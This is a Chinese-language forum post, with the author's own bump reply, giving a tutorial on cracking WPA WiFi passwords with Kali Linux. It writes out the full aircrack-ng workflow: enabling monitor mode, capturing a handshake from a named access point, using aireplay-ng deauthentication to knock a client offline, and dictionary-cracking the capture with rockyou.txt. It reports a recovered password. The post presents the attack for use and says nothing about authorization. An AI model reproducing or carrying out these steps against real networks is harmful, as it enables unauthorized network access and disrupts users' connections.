请选择 进入手机版 | 继续访问电脑版
查看: 4370|回复: 1

利用KALI暴力破解WiFi密码

[复制链接]
  • TA的每日心情
    开心
    3 天前
  • 签到天数: 338 天

    [LV.8]以坛为家I

    发表于 2018-9-3 16:59:04 | 显示全部楼层 |阅读模式
    本帖最后由 薯片 于 2018-9-3 16:59 编辑

    1.将无线网卡设置成 monitor 模式 airmon-ng start wlan0

    关闭可影响实验的因素 airmon-ng check kill

    2.运行 airodump-ng wlan0 扫描附近网段


    暴力破解 WiFi 密码



    BSSID   wifi 设备的 mac 地址

    PWR   信号强度

    Beacons   数据的速率

    #Data   捕获的数据分组数量

    #/S   十秒内的捕获数据分组数量

    CH   信道号

    MB   数据传输速率

    ENC   加密类型

    CIPHER   加密算法

    AUTH   加密协议

    ESSID WiFi 名称

    3.确定好要破解的网络(以 2.4G 网络(备·)为例) 执行下面的命令

    airodump-ng wlan0 –bssid F4:6A:92:2E:E8:B4 -c 1 -w pj/01

    注释:-c 为指定信道 -w 为文件存放位置并起一个名

    暴力破解 WiFi 密码

    出现红框内内容表示已抓取到握手包 准备破解密码

    如果抓不到握手包 可以发动攻击使一个已连接的用户掉线 使其重新认证连接 我们就此机会抓取握手包

    aireplay-ng -0 10 -a F4:6A:92:2E:E8:B4 -c 78:02:F8:F1:8E:CD wlan0

    暴力破解 WiFi 密码

    注释:攻击模式为 0 攻击 10 次 攻击次数调为 0 为无限攻击 -a 为 AP 端 mac 地址 -c 为客户端 mac 地址 wlan0 为无线网卡的名字



    附介绍几种攻击模式

    Attack 0: Deauthentication 解除认证

    Attack 1: Fake authentication 伪造身份验证

    Attack 2: Interactive packet replay 交互式数据包重播

    Attack 3: ARP request replay attack ARP 请求重播攻击

    Attack 4: KoreK chopchop attack KoreK 斩杀攻击

    Attack 5: Fragmentation attack 碎片攻击

    Attack 6: Cafe-latte attack 咖啡拿铁攻击

    Attack 7: Client-oriented fragmentation attack 面向客户的分片攻击

    Attack 8: WPA Migration Mode WPA 迁移模式

    Attack 9: Injection test 注射试验

    4.ls 01*查看抓到包 选择 cap 格式

    暴力破解 WiFi 密码

    使用字典暴力破解

    aircrack-ng -w /usr/share/wordlists/rockyou.txt 01-02.cap



    暴力破解 WiFi 密码



    破解成功 密码为 15331301

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

  • TA的每日心情
    开心
    3 天前
  • 签到天数: 338 天

    [LV.8]以坛为家I

     楼主 发表于 2018-9-3 17:00:13 | 显示全部楼层
    给自己顶一下
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表